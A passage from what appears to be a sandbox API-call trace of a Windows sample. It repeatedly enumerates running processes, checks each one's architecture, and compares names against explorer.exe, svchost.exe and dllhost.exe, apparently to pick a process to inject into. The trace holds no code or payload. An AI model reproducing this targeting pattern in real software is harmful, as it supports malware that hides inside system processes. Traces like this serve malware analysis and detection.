cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0216.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0216.172] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.172] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.172] CloseHandle (hObject=0xec) returned 1 [0216.172] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0216.172] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0216.172] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0216.172] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0216.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0216.173] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.173] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.173] CloseHandle (hObject=0xec) returned 1 [0216.173] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0216.173] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0216.173] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0216.173] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0216.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0216.173] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.173] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.173] CloseHandle (hObject=0xec) returned 1 [0216.173] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0216.173] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0216.173] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0216.174] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0216.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0216.174] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.174] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.174] CloseHandle (hObject=0xec) returned 1 [0216.174] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0216.174] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0216.174] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0216.174] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0216.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0216.175] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.175] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.175] CloseHandle (hObject=0xec) returned 1 [0216.175] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0216.175] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0216.175] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0216.175] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0216.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0216.175] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.175] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.175] CloseHandle (hObject=0xec) returned 1 [0216.175] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0216.176] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0216.176] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0216.176] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0216.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0216.176] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.176] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.176] CloseHandle (hObject=0xec) returned 1 [0216.176] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0216.176] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0216.176] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0216.176] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0216.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0216.177] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.177] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.177] CloseHandle (hObject=0xec) returned 1 [0216.177] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0216.177] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0216.177] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0216.177] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0216.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0216.177] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.177] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.177] CloseHandle (hObject=0xec) returned 1 [0216.178] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0216.178] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0216.178] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0216.178] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0216.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0216.178] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.178] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.179] CloseHandle (hObject=0xec) returned 1 [0216.179] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0216.179] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0216.179] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0216.179] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0216.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0216.179] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.179] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.179] CloseHandle (hObject=0xec) returned 1 [0216.179] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0216.179] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0216.179] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0216.179] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0216.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0216.180] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.180] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.180] CloseHandle (hObject=0xec) returned 1 [0216.180] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0216.180] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0216.180] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0216.180] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0216.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0216.180] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.181] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.181] CloseHandle (hObject=0xec) returned 1 [0216.181] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0216.181] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0216.181] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0216.181] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0216.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0216.181] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.181] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.181] CloseHandle (hObject=0xec) returned 1 [0216.181] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0216.181] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0216.181] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0216.181] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0216.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0216.182] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.182] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.182] CloseHandle (hObject=0xec) returned 1 [0216.182] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0216.182] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0216.182] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0216.182] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0216.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0216.183] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.183] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.183] CloseHandle (hObject=0xec) returned 1 [0216.183] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0216.183] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0216.183] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0216.183] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0216.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0216.183] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0216.184] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0216.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0216.184] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0216.185] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0216.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0216.185] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0216.186] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.186] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.186] CloseHandle (hObject=0xec) returned 1 [0216.186] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0216.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0216.186] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.186] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.186] CloseHandle (hObject=0xec) returned 1 [0216.186] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0216.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0216.187] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0216.187] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.187] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.188] CloseHandle (hObject=0xec) returned 1 [0216.188] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0216.188] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0216.188] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.188] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.188] CloseHandle (hObject=0xec) returned 1 [0216.188] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.189] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0216.189] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.189] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.189] CloseHandle (hObject=0xec) returned 1 [0216.189] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0216.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0216.190] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.190] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.190] CloseHandle (hObject=0xec) returned 1 [0216.190] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0216.190] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0216.190] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0216.190] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0216.190] CloseHandle (hObject=0xe8) returned 1 [0216.190] Sleep (dwMilliseconds=0x3e8) [0217.208] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0217.210] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0217.210] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0217.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0217.211] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0217.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0217.211] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0217.212] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0217.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0217.212] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0217.213] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0217.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0217.213] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0217.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0217.214] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0217.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0217.214] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0217.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0217.215] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, 